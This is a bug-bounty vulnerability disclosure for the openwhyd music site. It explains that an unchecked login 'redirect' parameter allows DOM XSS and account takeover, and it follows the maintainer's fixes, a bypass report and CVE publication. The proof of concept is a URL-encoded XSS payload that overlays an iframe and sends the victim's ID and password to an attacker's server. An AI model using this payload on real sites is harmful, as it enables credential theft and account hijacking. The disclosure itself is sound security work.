Improper Authorization in openwhyd/openwhyd


Reported on

Dec 5th 2021


This Account Takeover via Dom XSS vulnerability occurs because the backend does not check the value of the redirect parameter in the login logic.

          if (form.fbUid)
            userModel.update(dbUser._id, {
              $set: {
                fbId: form.fbUid,
                fbTok: form.fbTok, // access token provided on last facebook login
          renderRedirect(form.redirect || '/', dbUser);
          return; // prevent default response (renderForm)
        } else if (form.action != 'logout') {
          form.wrongPassword = 1;
          form.error = 'Your password seems wrong... Try again!';

If look at the login logic, upon successful login, the renderRedirect() function is called, and the redirect value is passed as an argument value of renderRedirect() function without any verification

  // in case of successful login
  function renderRedirect(url, user) {
    request.session.whydUid = (user || {}).id;
    if (!form.ajax) response.renderHTML(loggingTemplate.htmlRedirect(url));
    else {
      var json = { redirect: url };
      if (form.includeUser) {
        userApi.fetchUserData(user, function (user) {
          json.user = user;
      } else renderJSON(json);

The above code is executed when login is successful. I could see calling the htmlRedirect() method in the first if statement in the renderRedirect() function.

exports.htmlRedirect = function (url) {
  return url == 'closeWindow'
    ? exports.htmlCloseWindow()
    : [
        '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">',
        '<title>Openwhyd is redirecting...</title>',
        '<meta http-equiv="REFRESH" content="3;url=' + url + '"></HEAD>',
        'You are being redirected to: <a href="' + url + '">' + url + '</a>...',
        '<script>window.location.href="' + url + '";</script>',

If analyze the htmlRedirect() method, you can see that the value of url is put as the href value of the a tag without any verification. If it is possible to insert a javascript: scheme as a value of url, XSS can be triggered.

Look at the picture above, you can see that the value of the Redirect parameter is inserted as an input tag!

You can see that the new login page is loaded with IFRAME on successful login!

Finally, click on the screen and your user account will be transferred to the hacker's server!

Proof of Concept

1. Open the;f.setAttribute(%22id%22,%22poc%22);f.setAttribute(%22style%22,%22overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px%22);f.src=%22;document.getElementsByTagName(%22body%22)[0].appendChild(f);setTimeout(()=%3Edocument.getElementsByTagName(%27iframe%27)[0].contentDocument.getElementById(%27contentPane%27).addEventListener(%22click%22,function(){location.replace(`${document.getElementsByTagName(%27iframe%27)[0].contentDocument.getElementsByTagName(%27input%27)[5].value}%26PW=${document.getElementsByTagName(%27iframe%27)[0].contentDocument.getElementsByTagName(%27input%27)[6].value}`)}),1000);
2. Log in.
3. If you click the screen after 1 second after successful login, your account will be hijacked to the hacker's server!

Test Account
> ID :
> PW : qwer1202@

Video :


It is free to run scripts in the victim's browser.

We are processing your report and will contact the openwhyd team within 24 hours. 2 years ago
Pocas modified the report
2 years ago
We have contacted a member of the openwhyd team and are waiting to hear back 2 years ago
We have sent a follow up to the openwhyd team. We will try again in 7 days. 2 years ago
Pocas modified the report
2 years ago
Pocas modified the report
2 years ago
2 years ago


When will maintainers check for this vulnerability? :)

Adrien Joly validated this vulnerability 2 years ago
Pocas has been awarded the disclosure bounty
The fix bounty is now up for grabs
Adrien Joly marked this as fixed in 1.45.12 with commit 102a97 2 years ago
Adrien Joly has been awarded the fix bounty
This vulnerability will not receive a CVE
2 years ago


Hello! A patch has been identified for this vulnerability. But the vulnerability still occurs! The reason is that the redirect parameter prevents the use of external domains, but I can insert other tags by escaping the <script> tag by inserting a tag.

So, in order to solve this, the code I attached at the beginning needs to be patched by the maintainer!

When entering the url value as the value of location.href, it is recommended to process the Entity!

Adrien Joly
2 years ago


Thanks for the heads up, this fix should be safer:

2 years ago


Do you agree to assign and publish a CVE for this vulnerability? thank you

Adrien Joly
2 years ago


Yes, ok.

Jamie Slome
2 years ago


CVE published! 🎊

to join this conversation